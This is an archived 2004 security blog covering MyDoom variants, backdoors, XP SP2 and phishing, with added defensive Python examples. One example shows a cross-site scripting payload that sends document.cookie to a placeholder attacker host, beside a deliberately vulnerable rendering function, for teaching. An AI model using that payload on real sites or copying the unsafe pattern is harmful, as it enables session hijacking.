August 2004 - Posts
McAfee, Trend Micro, and other AV vendors have rated this variant MEDIUM RISK because of its prevalence.
MyDoom.S - MEDIUM RISK (appears as archived photos)
This virus is received in an email message as follows:
Subject : photos
Attachment : photos_arc.exe
SOME BAD NEWS ON THIS ONE: If MyDoom.S infects your PC, it attempts to download BackDoor-CHR. Once this stealth driver is running on the victim machine, the threat is not detected by conventional AV scanning methods.
BackDoor-CHR - hidden backdoor installed by MyDoom.S
This remote access trojan is downloaded by W32/Mydoom.s@MM. It bears the following characteristics:
* stealths its activity on the victim machine
* serves as a HTTP and SMTP proxy
* attempts to connect to numerous remote IRC servers
* appends entries to the local hosts file (in an attempt to block updates for many AV products)
* The trojan attempts to connect to a remote IRC server to await command. It carries a list of IP addresses and relevant ports for these servers ...
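The hosts-file trick in the description above is worth checking for directly, since a machine whose AV updates are silently sinkholed looks healthy. As an added example (my code, not part of the McAfee write-up), the Python script below audits a Windows hosts file (%SystemRoot%\system32\drivers\etc\hosts on XP) and reports any hostname, other than the defaults, that is mapped to a loopback or 0.0.0.0 address, plus any name on an optional watchlist that has been overridden at all. The sample hosts file and the vendor hostnames in it are constructed placeholders, not entries taken from this or any other trojan.

```python
import ipaddress

# Constructed sample: a default Windows hosts file to which a backdoor has
# appended sinkhole entries. The vendor hostnames are placeholders.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
127.0.0.1       localhost
127.0.0.1       update.av-vendor.example
127.0.0.1       liveupdate.av-vendor.example
0.0.0.0         download.av-vendor.example
10.0.0.5        intranet.corp.example      # legitimate internal override
"""

# Names a stock hosts file is expected to map; everything else is reviewed.
EXPECTED = {"localhost", "localhost.localdomain", "broadcasthost"}

# Addresses commonly used to sinkhole a name so the client can never reach it.
SINKHOLE = {
    ipaddress.ip_address("127.0.0.1"),
    ipaddress.ip_address("0.0.0.0"),
    ipaddress.ip_address("::1"),
}


def parse_hosts(text):
    """Yield (ip, hostname, line_no) for every mapping in a hosts file.

    Comments (# to end of line) and blank lines are skipped; a line listing
    several hostnames yields one tuple per name."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # malformed address; a stricter audit could report it
        for name in fields[1:]:
            yield ip, name.lower(), line_no


def audit_hosts(text, watchlist=()):
    """Return (line_no, hostname, ip, reason) findings for suspicious entries.

    A finding is raised when a non-default name is mapped to a sinkhole
    address (the pattern used to block update servers), or when a name on
    the watchlist, or a subdomain of it, is overridden to any address."""
    watch = {w.lower() for w in watchlist}
    findings = []
    for ip, name, line_no in parse_hosts(text):
        if name in EXPECTED:
            continue
        if ip in SINKHOLE:
            findings.append((line_no, name, str(ip), "sinkholed"))
        elif name in watch or any(name.endswith("." + w) for w in watch):
            findings.append((line_no, name, str(ip), "watchlisted name overridden"))
    return findings


if __name__ == "__main__":
    for finding in audit_hosts(SAMPLE_HOSTS, watchlist=["av-vendor.example"]):
        print("line %d: %s -> %s (%s)" % finding)
```

On a suspect machine, read the real file into `audit_hosts` and treat any "sinkholed" finding for a vendor update host as a sign that the scanner's own results can no longer be trusted.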
The Internet Storm Center shares some great information on user experiences for installing Service Pack 2 (SP2). Users will benefit greatly from the major security improvements found in SP2 but should carefully check their current configurations for any issues.
Windows XP SP2 - Installation Experiences
Microsoft documents programs that may behave differently
Windows XP SP2 - Over 500 users record experiences
This concise article provides some excellent strategies for improved wireless network security. A brief summary with quotes is noted below.
1. Don't breach your own firewall
You've almost certainly firewalled the network, wireless or not, and rightly so. However, you've done yourself no good if your configuration doesn't place your wireless system's access points outside the firewall.
2. Don't spurn Media Access Control
Media Access Control (MAC) is often ignored because it's not spoof-proof. But it is another brick in the wall: It's essentially another address filter, and it clogs up the works for the potential hacker. What it does is limit network access to registered devices that you identify on address-based access control rosters.
3. Don't spurn WEP
The Wired Equivalent Privacy (WEP) is a protocol specific to wireless security, conforming to the 802.11b standard. It encrypts data as it goes wireless, over and above anything else you're using. Use it. But remember that it is key-based, so don't stay with the default key. You may even wish to create a unique WEP key for individual users when they first access the system. Yet don't rely on WEP alone.
4. Don't allow unauthorized access points
Access points are so incredibly easy to set up, and an over-burdened IT department might easily simply loosen the rules to allow them to be set up on an as-needed basis by anyone smart enough to run a VCR. But don't succumb to this temptation. The access point is a primary target for an intruder. Implement a deployment strategy and procedure, and stick to them.
5. Don't permit ad-hoc laptop communication
This is a tough one to enforce in any enterprise. Ad-hoc mode lets Wi-Fi clients link directly to another nearby laptop, which is so convenient, you just can't imagine not using it.
Clark Howard hosts a national talk radio show providing advice on financial and consumer matters. As a regular part of this broadcast, listeners are often warned on scams that are circulating in the public. This article appears in the latest Clark Howard newsletter discussing the need to be vigilant while processing email messages.
Banks, ISPs, and financial institutions do not request confidential information by email, so always verify such a request through a channel you already trust (for example, the phone number on your statement), even if the message appears authentic.
E-mail phishing scams steal millions
Criminals are usually pretty stupid. But sometimes criminals are so brilliant that they seem unstoppable and indestructible. One recent crime wave involves “phishing” e-mails, and unfortunately criminals are having tremendous success with it.
What happens is these clever crooks send you an e-mail, pretending to be from your bank, credit card company, Internet service or auction site. They convince you that you need to verify your information by using very realistic graphics and phony but very believable Web sites. You think you’re verifying the information, but you’re really handing over your financial information to criminals and they’re stealing your money.
According to Gartner Inc., criminals have stolen between $2 and $3 billion over the past year. The average amount stolen is about $1,200. The e-mails you receive are so realistic that people don’t even realize or remember that they have responded. Yet about one in 30 are responding. Whenever you get one of these official looking e-mails, don’t bite.
No organization would send you an e-mail like this. If you think your bank is contacting you, don’t click. Call your bank on the phone and ask someone. In many cases, if you get scammed, your bank will give you your money back. But in the meantime, you don’t have any money.
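A check that turns "don't click" into something a mail filter can do: as an added example (my code, not from the newsletter), the Python function below extracts the links from an HTML message body and reports any that do not belong to the domain the message claims to come from. It catches the two tricks the article describes: a believable look-alike hostname or a bare IP address as the real target, and visible link text that shows the bank's own address while the href goes elsewhere. The sample message, the bank name and its domain are constructed placeholders.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample phishing body. "examplebank.com" stands in for the
# institution the message pretends to be from.
SAMPLE_MAIL = """
<p>Dear customer, please verify your account at
<a href="http://www.examplebank.com.verify-login.example/acct">www.examplebank.com</a>
or <a href="http://192.0.2.10/examplebank/login">https://www.examplebank.com/login</a>.</p>
<p>Questions? See <a href="https://www.examplebank.com/help">our help pages</a>.</p>
"""


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs from the anchors in an HTML fragment."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _host(url):
    """Lower-cased hostname of url (scheme optional), or None if it has none."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    return parts.hostname.lower() if parts.hostname else None


def _is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def _belongs_to(host, domain):
    """True if host is domain itself or a subdomain of it."""
    return host == domain or host.endswith("." + domain)


def check_links(html_body, claimed_domain):
    """Return [(href, [reasons])] for links that do not belong to claimed_domain.

    A link is reported when its target is an IP address, when its host is
    not under the claimed domain (this includes the claimed domain used as a
    prefix of an attacker-owned name), or when the visible text names one
    host while the href points at another."""
    collector = _LinkCollector()
    collector.feed(html_body)
    claimed_domain = claimed_domain.lower()
    findings = []
    for href, text in collector.links:
        host = _host(href)
        if host is None:
            continue  # mailto:, javascript:, fragments; out of scope here
        reasons = []
        if _is_ip(host):
            reasons.append("link target is an IP address")
        elif not _belongs_to(host, claimed_domain):
            reasons.append("host %s is not under %s" % (host, claimed_domain))
        # Only treat the anchor text as a host claim if it looks like one.
        text_host = _host(text) if re.match(r"^(https?://)?[\w.-]+\.\w+", text) else None
        if text_host and text_host != host:
            reasons.append("visible text names %s but link goes to %s" % (text_host, host))
        if reasons:
            findings.append((href, reasons))
    return findings


if __name__ == "__main__":
    for href, reasons in check_links(SAMPLE_MAIL, "examplebank.com"):
        print(href)
        for reason in reasons:
            print("   ", reason)
```

The check is deliberately strict about the claimed domain: a legitimate bank that sends its customers to a third-party host will trip it, which is exactly the habit the article is asking readers to break.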
There were no Windows security updates for workstations and servers during August 2004, so most administrators and home users can rest after a busy round of updates in July. The only bulletin for August was an Exchange Server 5.5 security update, described below.
MS04-026 - Exchange 5.5 cross-site scripting and spoofing patch
This bulletin addresses a cross-site scripting and spoofing vulnerability in Outlook Web Access for Exchange Server 5.5. The cross-site scripting flaw could let an attacker convince a user to run a malicious script; if run, the script executes in the security context of that user, which could give the attacker access to any data on the Outlook Web Access server that the user could reach. Exploitation requires user interaction.
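The bulletin gives no details of the OWA flaw itself, so what follows is not a reproduction of it. It is an added example of the vulnerability class the bulletin describes: a webmail-style page that reflects a request parameter into its markup, shown in the vulnerable form beside the hardened form, with a small parser-based check that counts how many script elements a browser would see in each. The URL path, parameter and attacker hostname are placeholders I made up; the code is mine, not Microsoft's.

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote

# Constructed attacker input: closes the href attribute the page builds and
# injects a script that leaks the session cookie to a placeholder host.
PAYLOAD = '"><script>new Image().src="http://attacker.example/?c="+document.cookie</script>'


def render_unsafe(folder):
    """Vulnerable pattern: an untrusted request parameter is dropped into the
    page as-is, once inside an attribute and once as text. Whoever can get the
    user to open a crafted link now runs script as that user."""
    return '<a href="/mail/view?folder=%s">%s</a>' % (folder, folder)


def render_safe(folder):
    """Hardened form: encode for each context the value lands in. Inside the
    URL it is percent-encoded, then HTML-escaped because it sits in an
    attribute; as body text it is HTML-escaped with quotes included."""
    return '<a href="/mail/view?folder=%s">%s</a>' % (
        html.escape(quote(folder, safe=""), quote=True),
        html.escape(folder, quote=True),
    )


class _ScriptFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.scripts = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1


def script_count(markup):
    """Number of <script> elements an HTML parser finds in markup."""
    finder = _ScriptFinder()
    finder.feed(markup)
    return finder.scripts


if __name__ == "__main__":
    print("unsafe:", script_count(render_unsafe(PAYLOAD)), "script element(s)")
    print("safe:  ", script_count(render_safe(PAYLOAD)), "script element(s)")
```

The point of `script_count` is that "escaping" has to be judged by what a parser does with the result, not by whether the string still contains suspicious characters; the hardened output still carries the payload, harmlessly, as visible text.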
1: Firewall Enabled by Default
2: Messenger is Disabled by Default
3: Firewall Protects the Computer at Boot Time
4: Hundreds of New GPO Settings
5: Messenger Can Block Unsafe File Transfers
6: Memory Protection
7: Outlook Express E-mail Controls
8: Internet Explorer Add-On Management
9: Internet Explorer Download Prompting
10: Windows Update Services Support
F-Secure's weblog highlights the anniversary of Blaster today.
Blaster wasn't the first Internet worm to hit Microsoft technologies; many of us fought the Code Red worms in August 2001, which targeted IIS web servers. Blaster, however, hit both servers and workstations, so millions of home and corporate users felt it directly, rather than only the server administrators who worked behind the scenes to resolve Code Red.
This was a bad day for Microsoft, but I believe it led to many positive developments we enjoy today. Here are some examples:
* I've seen a "night and day" difference in System Administrators taking security patches and updates more seriously in the corporate world.
* Microsoft made improvements to their Windows Update approach (e.g., standard release date, ratings system, greater automation for users)
* Microsoft established a "bounty" system that has led to the arrest of some worm authors.
* Microsoft started providing worm cleaners and improved security baseline measurement tools.
* I also believe some of the major security improvements we see in XP SP2 are a direct result of this major Internet worm attack.
Blaster one year later (see August 10th entry)
Ad-Aware SE was released overnight and represents the latest from Lavasoft in spyware removal technology. Spybot 1.3, Ad-Aware SE, and Merijn's CWShredder are "must haves" in the network technician's tool kit. Ad-Aware SE Product Information http://www.lavasoftusa.com/news/product/
quote: Ad-Aware is designed to provide advanced protection from known Data-mining, aggressive advertising, Parasites, Scumware, selected traditional Trojans, Dialers, Malware, Browser hijackers, and tracking components. With the release of Ad-Aware SE Personal edition, Lavasoft takes the fight against Spyware to the next level. DOWNLOAD SITES for freeware version.
With Lavasoft’s all new Code Sequence Identification (CSI) technology, you will not only be protected from known content, but will also have advanced protection against many of their unknown variants. To further protect you, Ad-Aware SE Personal Edition also has the capability to scan and list Alternate Data Streams (ADS) in NTFS enabled volumes. In combination with the new scanning engine, Ad-Aware SE will scan your computer faster and more thoroughly than ever before!
This is a mass-mailing worm which has the following characteristics:
* contains its own SMTP engine to construct outgoing messages
* harvests email addresses from the victim machine
* the From: address of messages is spoofed
* attachment is a zip file, which contains an EXE and HTML file
* contains a remote access component (a notification is sent to the attacker)
* copies itself to folders whose names contain the string "shar" (such as the shared folders of common peer-to-peer applications: KaZaa, Bearshare, Limewire, etc.)
* The worm sends out a ZIP file that contains an HTML file and an EXE file. The EXE is placed in a subfolder inside the ZIP, so when the archive is viewed with Windows Explorer (rather than a stand-alone ZIP handler such as WinZip or PKZIP) only the HTML file and a folder are visible.
The HTML file contains exploit code which, on vulnerable systems, automatically runs the EXE file, a downloader trojan. The downloader then contacts a large number of remote web sites to retrieve the virus itself.
SAMPLE EMAIL FORMAT
From : (address is spoofed)
Subject : (blank)
There is an indication in the file that it may also try to password-protect some ZIP files, in which case it will add one of the following to the message body:
The password is
The password will then be contained in an embedded image file.
Attachment: (may be one of the following)
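The folder trick described above (HTML at the root, EXE in a subfolder) and the password-protected variant are both things a mail gateway can look for before a user ever sees the attachment. As an added example (my code, not from the vendor description), the Python script below builds a constructed archive of that shape, with an executable stub that carries a valid MZ signature but is not a real program, and inspects it: it flags executable content by extension and by PE header, notes encrypted entries it cannot scan, and reports the lure combination. The file names are placeholders, not the real attachment names.

```python
import io
import posixpath
import zipfile

# Extensions Windows will execute directly when double-clicked.
EXEC_EXTS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".vbs", ".js", ".hta"}


def build_zip(entries):
    """Build an in-memory ZIP from a {name: bytes} mapping (test data only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_sample_zip():
    """Constructed lure archive: an HTML file at the root and an executable
    stub (MZ signature only, not a real program) tucked into a subfolder."""
    return build_zip({
        "photos.html": b"<html><body>Loading photos...</body></html>",
        "photos/photos.exe": b"MZ" + b"\x00" * 62,
    })


def inspect_zip(data):
    """Return a list of (entry, reason) findings for a ZIP attachment.

    Flags executable content by extension and by PE ('MZ') header, encrypted
    entries whose content cannot be scanned, and the lure pattern of an HTML
    file at the root with an executable hidden in a subfolder."""
    findings = []
    root_html = False
    nested_exec = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            if name.endswith("/"):
                continue  # directory entry, nothing to scan
            ext = posixpath.splitext(name)[1].lower()
            depth = name.count("/")
            if depth == 0 and ext in (".htm", ".html"):
                root_html = True
            if info.flag_bits & 0x1:  # general-purpose bit 0: entry is encrypted
                findings.append((name, "encrypted entry; content cannot be scanned"))
                magic = b""
            else:
                with zf.open(info) as fh:
                    magic = fh.read(2)
            by_ext = ext in EXEC_EXTS
            by_magic = magic == b"MZ"
            if by_magic and not by_ext:
                findings.append((name, "PE header behind a non-executable extension"))
            if by_ext or by_magic:
                findings.append((name, "executable content"))
                if depth > 0:
                    nested_exec.append(name)
    if root_html and nested_exec:
        findings.append(("<archive>",
                         "HTML lure at root, executable in subfolder: " + ", ".join(nested_exec)))
    return findings


if __name__ == "__main__":
    for entry, reason in inspect_zip(build_sample_zip()):
        print("%-20s %s" % (entry, reason))
```

An encrypted entry is reported rather than ignored on purpose: the password-in-an-image trick exists precisely so the gateway cannot open the archive, so "unscannable" should be treated as a verdict, not a pass.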
All new variants of the MyDoom family should be carefully monitored as the new "R" variant emerged overnight.
MyDoom.R - New Variant
This new variant bears the following characteristics:
* contains its own SMTP engine for constructing messages
* harvests target email addresses from the victim machine
* forges the From: header of outgoing messages
* downloads a file from a remote server
This provides excellent planning information for deployment of Windows XP SP2 in the corporate environment.
Windows XP SP2 - Key resources for IT Professionals
Features and Functionality
Changes to Functionality in Microsoft Windows XP Service Pack 2 -- Recently updated, this document provides detailed information about the changes to network protection, memory protection, email handling, enhanced browser security, and other technologies included in Windows XP Service Pack 2.
FAQ: How Windows XP Service Pack 2 Affects Systems Management Server 2003 -- Review the Windows XP section of the SMS Client FAQ to find out how Microsoft Windows XP SP2 affects SMS client and SMS administration from a computer running XP SP2.
FAQ: How Windows XP Service Pack 2 Affects SQL Server and MSDE -- Review this FAQ to find answers to common questions about how Microsoft Windows XP SP2 affects installations of SQL Server 2000 and SQL Server Desktop Engine (MSDE).
New Networking Features in Windows XP SP2 -- This service pack includes new networking features, providing enhanced security and additional functionality for wireless users and peer-to-peer network applications.
Enterprise Computing and Windows XP SP2 -- This on-demand TechNet Support webcast addresses some of the major improvements Microsoft Windows XP Service Pack 2 provides for businesses that have an enterprise computing environment.
Brador is the first known backdoor for Pocket PC hand-held devices. When run, the backdoor copies itself to the startup folder, mails the IP address of the PDA to the backdoor author and starts listening for commands on a TCP port. The attacker can then connect to the PDA on that port and control it through the backdoor.
Microsoft is preparing Windows XP SP2 for public distribution soon and this site is devoted to some of the key support questions regarding this upgrade.
Key Links for Windows XP SP2 information
If you use either of these Mozilla browsers, note that four vulnerabilities were patched overnight. It is recommended that you upgrade as soon as possible. Firefox 0.9.3 is working well for me in my early testing.
Firefox 0.9.3 - FTP Site (all OS's and builds)
Mozilla 1.7.2 - FTP Site (all OS's and builds)
Firefox 0.9.3 - Download Link for EXE version
This link shares some of the forthcoming features that will be part of Service Pack 2, which is expected to reach production release by the end of August 2004.
F-Secure has also published a public message to assist in this effort.
MyDoom author wanted -- $250,000 Bounty by Microsoft
THIS IS A PUBLIC MESSAGE FROM F-SECURE TO ANYBODY WHO MIGHT HAVE INFORMATION ON THE WHEREABOUTS OF THE PERSON OR PERSONS BEHIND THE MYDOOM VIRUS FAMILY
We are urging anyone who knows the party behind Mydoom variants to contact the authorities, let them know who's behind it and to collect $250,000. Microsoft offered this public bounty reward on Mydoom on March 11th. It's still valid.
If you have information on the origin of Mydoom, you're most likely connected to spamming in one way or the other (as Mydoom is used to create spam proxies). So you should be able to appreciate money. $250,000 is a lot of money. Think about it.
Report all information on the whereabouts of the virus writers behind Mydoom via the forms at Internet Fraud Complaint Center or FBI. Remember to mention that you're interested in collecting the Microsoft bounty. Feel free to report via a remailer using a fake identity and leave an E-Gold account. As long as you report. Do it now. If you're uneasy about filling forms and sending them to FBI, just contact us. We will work with you.
CERT provides a number of excellent articles in their Reading Room, and this link provides the last 25 articles published.
This new variant is beginning to spread in the wild as reported by the Internet Storm Center:
Secunia link for several AV vendors
McAfee's description of new "Q" variant
DAT 4383 or daily DATs required
An excellent 15-page article from one of my favorite security sites.
CERT: The challenges of Security Management
All Windows XP users are advised to run Windows Update again to ensure that their patches were correctly applied. Microsoft stated the following:
"Subsequent to the release of this security bulletin, Microsoft was made aware that the update provided for Windows XP customers running the new version of Windows Update, Windows Update Version 5, did not contain the final release code for the vulnerabilities addressed in the security bulletin. Microsoft has corrected the update and is re-releasing this bulletin to advise of the availability of a revised update available to Windows Update Version 5 customers. Customers who are utilizing Windows Update Version 4, the vast majority of customers, are not affected by this revision."